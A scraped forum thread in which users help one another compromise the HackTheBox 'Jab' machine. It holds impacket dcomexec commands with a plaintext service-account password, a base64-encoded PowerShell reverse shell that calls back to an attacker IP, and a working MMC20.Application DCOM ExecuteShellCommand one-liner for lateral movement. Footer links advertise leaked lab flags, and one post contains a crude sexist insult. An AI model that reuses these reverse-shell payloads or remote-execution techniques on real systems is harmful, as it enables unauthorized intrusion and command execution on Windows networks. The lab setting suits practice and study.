Possibly Related Threads…

fl00d777 · Feb 25, 2024, 04:23 AM

Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

fracksi · Feb 25, 2024, 05:15 AM

(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /uservc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

[code]impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e ibetthiswaspartofit'

RIP. You will be missed. I'll keep the 'za warm for your return.

thing7 · Feb 25, 2024, 05:19 AM

Sorry to bother again with this stupid question, How can I extract the list from Pidgin?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

eclipse · Feb 25, 2024, 07:05 AM

(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /uservc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

[code]impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes

How to conduct in Windows ??? help

Use impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but no other things

wardensec · Feb 25, 2024, 07:13 AM

(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /uservc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

[code]impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes

How to conduct in Windows ??? help

Use impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but no other things

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

eclipse · Feb 25, 2024, 07:48 AM

(Feb 25, 2024, 07:13 AM)wardensec Wrote:
(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote: just runas /uservc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

[code]impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes

How to conduct in Windows ??? help

Use impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but no other things

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

a44857437 · Feb 25, 2024, 08:24 AM

(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote:
(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote: nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes

How to conduct in Windows ??? help

Use impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but no other things

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had same issue so swtiched to a windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?

WorstWurst · Feb 25, 2024, 08:47 AM

(Feb 25, 2024, 08:41 AM)Th35t0rm Wrote:
(Feb 25, 2024, 08:24 AM)a44857437 Wrote:
(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote: You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had same issue so swtiched to a windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?

runas /user:jab.htb\svc_openfire /netonly powershell
then
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X"))
https://book.hacktricks.xyz/windows-hard.../dcom-exec

stupid question but how do i get the initial shell to run the runascs

a44857437 · Feb 25, 2024, 09:18 AM

(Feb 25, 2024, 08:41 AM)Th35t0rm Wrote:
(Feb 25, 2024, 08:24 AM)a44857437 Wrote:
(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote: You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had same issue so swtiched to a windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?

runas /user:jab.htb\svc_openfire /netonly powershell
then
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X"))
https://book.hacktricks.xyz/windows-hard.../dcom-exec

Thanks! This one worked for me:
```
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.129.X.X")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping 10.10.X.X","7")
```

xxxbfacc · Feb 25, 2024, 11:48 AM

Hint for root. Look for exploit for a patched cve. It doesn’t work, but understanding will put you in the right direction

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	42	3,402	2 hours ago Last Post: 0x5k1z0
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	385	95,832	5 hours ago Last Post: rasa420
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	96	8,811	5 hours ago Last Post: rasa420
	[FREE] CPTS 12 FLAGS	pulsebreaker	86	3,112	5 hours ago Last Post: Mr_root
	[FREE] HackTheBox Academy - CAPE Path Study	Techtom	45	4,537	5 hours ago Last Post: BlazeFury